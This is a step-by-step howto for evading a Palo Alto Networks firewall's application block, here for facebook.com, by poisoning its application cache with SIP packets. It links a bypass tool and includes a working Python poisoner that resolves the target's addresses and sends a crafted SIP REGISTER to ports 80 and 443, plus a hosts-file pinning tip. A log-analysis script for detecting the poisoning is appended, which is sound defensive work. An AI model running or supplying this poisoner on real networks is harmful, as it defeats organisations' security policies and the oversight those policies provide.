PAN Bypass Step By Step HOWTO

1. Download pan_bypasser from http://goo.gl/9ulSY
2. Edit sip.txt and pan_bypass.bat so they reflect the FQDN you are poisoning (e.g. www.facebook.com)
3. Make sure the PAN box is running the latest version

4. Create 3 security rules as follows:

• The first rule blocks the facebook application (App-ID)
• The second rule allows the LAN network out to the Internet
• The third rule is the clean-up rule (deny everything else)

5. Test the policy and make sure access to facebook is blocked


6. Run pan_bypass.bat from the client machine. It sends SIP packets to the destination IP address/port, which poisons the application cache with a "sip" verdict for that destination


You can confirm that the cache was populated by running "show running application cache" on the PAN box



7. Now when you browse to www.facebook.com the connection should succeed
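The contents of sip.txt and pan_bypass.bat are not shown above, so here is an added example (not the pan_bypasser tool itself) of what the poisoning step does: resolve every address the FQDN points to, build a syntactically valid SIP REGISTER request, and send it as the first bytes of a TCP session to each address on the ports the web traffic will later use. The transport (TCP), the ports (80 and 443) and the placeholder addresses are assumptions made for this example, since the cache is keyed on destination IP/port and the page does not say which ports the original tool hits.

```python
import itertools
import socket

# Constructed for this example: the name being poisoned and the ports the later
# web traffic will use. Which ports need poisoning is an assumption; the original
# sip.txt / pan_bypass.bat are not shown on the page.
TARGET_FQDN = "www.facebook.com"
TARGET_PORTS = (80, 443)


def build_sip_register(fqdn, local_ip="192.0.2.10"):
    """Return a minimal, syntactically valid SIP REGISTER request as bytes.

    The first packet of the session has to look like SIP so the firewall
    classifies the flow as 'sip' and stores that verdict in its application
    cache for (dst ip, dst port). All header values are placeholders; local_ip
    is a documentation address (RFC 5737), not a real client.
    """
    lines = [
        "REGISTER sip:%s SIP/2.0" % fqdn,
        "Via: SIP/2.0/TCP %s:5060;branch=z9hG4bK-poison" % local_ip,
        "Max-Forwards: 70",
        "From: <sip:poison@%s>;tag=1" % fqdn,
        "To: <sip:poison@%s>" % fqdn,
        "Call-ID: poison-1@%s" % local_ip,
        "CSeq: 1 REGISTER",
        "Contact: <sip:poison@%s:5060;transport=tcp>" % local_ip,
        "Content-Length: 0",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def resolve_all(fqdn):
    """All IPv4 addresses the name currently resolves to (needs live DNS)."""
    infos = socket.getaddrinfo(fqdn, None, socket.AF_INET, socket.SOCK_STREAM)
    return sorted({info[4][0] for info in infos})


def poison_targets(addresses, ports=TARGET_PORTS):
    """Every (ip, port) pair to poison: the cache is per destination IP/port,
    so a name that resolves to several addresses needs one session per pair."""
    return [(ip, port) for ip, port in itertools.product(addresses, ports)]


def send_payload(ip, port, payload, timeout=3.0):
    """Open a TCP session to ip:port and write the SIP payload as its first bytes.

    Returns True if the payload was sent. The server's reply does not matter;
    only the firewall's view of the first packet does.
    """
    try:
        with socket.create_connection((ip, port), timeout=timeout) as s:
            s.sendall(payload)
            return True
    except OSError:
        return False


def hosts_entry(ip, fqdn):
    """Hosts-file line that pins the name to one address, the alternative to
    poisoning every address the name resolves to."""
    return "%s\t%s" % (ip, fqdn)


if __name__ == "__main__":
    payload = build_sip_register(TARGET_FQDN)
    for ip, port in poison_targets(resolve_all(TARGET_FQDN)):
        ok = send_payload(ip, port, payload)
        print(ip, port, "sent" if ok else "failed")
```

Only the payload builder, target expansion and hosts-file helper run offline; resolve_all and send_payload need the lab network. Run it from the client behind the PAN box, then check "show running application cache" before browsing to the site.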



You can see that the PAN box mistakenly logged the facebook.com sessions as SIP because of the cache poisoning attack: the cached application verdict is reused for every later session to the same destination IP/port, so the facebook block rule never matches and the traffic falls through to the allow rule
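That log artifact is also the detection opportunity. The following is an added example (not from the original page) that looks for the signature a poisoned cache leaves behind: sessions identified as "sip" whose destination port is not a SIP port, grouped by destination IP/port. The sample log lines are constructed in a simplified CSV layout for this example and are not the real PAN-OS traffic-log schema; adapt the field list to an actual export.

```python
import csv
import io
from collections import Counter

# Constructed sample, simplified layout (not the real PAN-OS traffic-log schema):
# time, src, dst, dport, proto, app, rule, action
# 192.0.2.10 stands in for the "facebook" address; all addresses are RFC 5737.
SAMPLE_LOG = """\
2012/06/01 10:00:01,10.1.1.50,192.0.2.10,80,tcp,sip,allow-lan-internet,allow
2012/06/01 10:00:02,10.1.1.50,192.0.2.10,443,tcp,sip,allow-lan-internet,allow
2012/06/01 10:00:03,10.1.1.50,192.0.2.10,443,tcp,sip,allow-lan-internet,allow
2012/06/01 10:00:04,10.1.1.51,198.51.100.7,443,tcp,ssl,allow-lan-internet,allow
2012/06/01 10:00:05,10.1.1.52,203.0.113.9,5060,udp,sip,allow-lan-internet,allow
2012/06/01 10:00:06,10.1.1.50,192.0.2.10,443,tcp,facebook-base,block-facebook,deny
"""

FIELDS = ["time", "src", "dst", "dport", "proto", "app", "rule", "action"]

# Ports on which each application is expected. Only sip is modelled here
# (assumption for this example); add other non-web apps as needed.
EXPECTED_PORTS = {"sip": {5060, 5061}}


def parse_log(text):
    """Turn the CSV text into a list of dicts keyed by FIELDS."""
    return [dict(zip(FIELDS, row)) for row in csv.reader(io.StringIO(text)) if row]


def app_port_mismatches(rows):
    """Sessions whose App-ID verdict contradicts the destination port.

    A poisoned cache produces exactly this: app reported as 'sip' while the
    destination port is 80/443 and the session was allowed.
    """
    found = []
    for r in rows:
        expected = EXPECTED_PORTS.get(r["app"])
        if expected is not None and int(r["dport"]) not in expected:
            found.append(r)
    return found


def suspicious_destinations(rows, threshold=2):
    """(dst, dport) pairs with at least `threshold` mismatched sessions,
    i.e. destinations that are most likely poisoned cache entries."""
    counts = Counter((r["dst"], r["dport"]) for r in app_port_mismatches(rows))
    return sorted(key for key, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    rows = parse_log(SAMPLE_LOG)
    for r in app_port_mismatches(rows):
        print("mismatch:", r["src"], "->", r["dst"], r["dport"], r["app"], r["action"])
    print("likely poisoned:", suspicious_destinations(rows))
```

Run over a real traffic-log export, the rows flagged here are the ones to compare against "show running application cache" on the box; a single mismatch can be a genuine SIP endpoint on an odd port, repeated mismatches to one web-port destination are the attack.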


Quod Erat Demonstrandum

note:
Since the cache attack keys on destination IP address/port and not on the FQDN, it is more challenging with names that resolve to changing or multiple addresses (e.g. www.facebook.com).
You can either pin the name to one address in the hosts file, or run the poisoner against every IP address the name resolves to.